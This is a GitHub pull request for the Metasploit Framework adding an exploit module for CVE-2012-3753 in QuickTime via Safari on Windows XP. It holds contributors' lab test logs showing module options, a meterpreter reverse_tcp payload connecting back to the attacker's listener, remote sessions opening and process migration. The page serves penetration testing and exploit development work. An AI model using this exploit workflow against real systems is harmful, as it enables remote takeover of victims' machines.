Added module for cve-2012-3753 #1098

jvazquez-r7 · 2012-11-27T11:18:22Z

Tested successfully on Windows XP SP3 / Quicktime 7.7.2 with:
Safari 5.0.5: exploits safari.exe => works pretty reliable in my tests
Safari 5.1.7: exploits WebKit2WebProcess.exe => works pretty reliable in the first try in my tests, if something fails, even when Webkit2WebProcess will recover automatically it won't work reliable
Feedback about the spray results on safari is welcome

msf  exploit(apple_quicktime_mime_type) > show options

Module options (exploit/windows/browser/apple_quicktime_mime_type):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   true             no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(apple_quicktime_mime_type) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.129:4444 
[*] Using URL: http://0.0.0.0:8080/vaU4UW
[*]  Local IP: http://192.168.1.129:8080/vaU4UW
[*] Server started.
msf  exploit(apple_quicktime_mime_type) > [*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending initial HTML
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending exploit (target: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2)
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 4 opened (192.168.1.129:4444 -> 192.168.1.140:1582) at 2012-11-27 12:00:49 +0100
[*] Session ID 4 (192.168.1.129:4444 -> 192.168.1.140:1582) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: Safari.exe (816)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2096
[+] Successfully migrated to process 
[*] 192.168.1.140 - Meterpreter session 4 closed.  Reason: Died

msf  exploit(apple_quicktime_mime_type) > 
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending initial HTML
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending exploit (target: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2)
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 5 opened (192.168.1.129:4444 -> 192.168.1.140:4009) at 2012-11-27 12:02:58 +0100
[*] Session ID 5 (192.168.1.129:4444 -> 192.168.1.140:4009) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: WebKit2WebProcess.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 284
[+] Successfully migrated to process 

msf  exploit(apple_quicktime_mime_type) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : MSFWORK2
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(apple_quicktime_mime_type) > exit -y

[*] Server stopped.

wchen-r7 · 2012-11-27T16:45:16Z

Tested:

[*] 10.0.1.6         apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 10.0.1.6         apple_quicktime_mime_type - Sending initial HTML
[*] 10.0.1.6         apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 10.0.1.6         apple_quicktime_mime_type - Sending exploit (target: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2)
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:1539) at 2012-11-27 10:44:21 -0600
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.6:1539) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: WebKit2WebProcess.exe (1288)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3140
[+] Successfully migrated to process

Added module for cve-2012-3753

8c53b27

wchen-r7 merged commit 8c53b27 into rapid7:master Nov 27, 2012

jvazquez-r7 deleted the apple_quicktime_mime_type branch November 18, 2014 15:44

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Added module for cve-2012-3753 #1098

Added module for cve-2012-3753 #1098

jvazquez-r7 commented Nov 27, 2012

wchen-r7 commented Nov 27, 2012

Added module for cve-2012-3753 #1098

Added module for cve-2012-3753 #1098

Conversation

jvazquez-r7 commented Nov 27, 2012

wchen-r7 commented Nov 27, 2012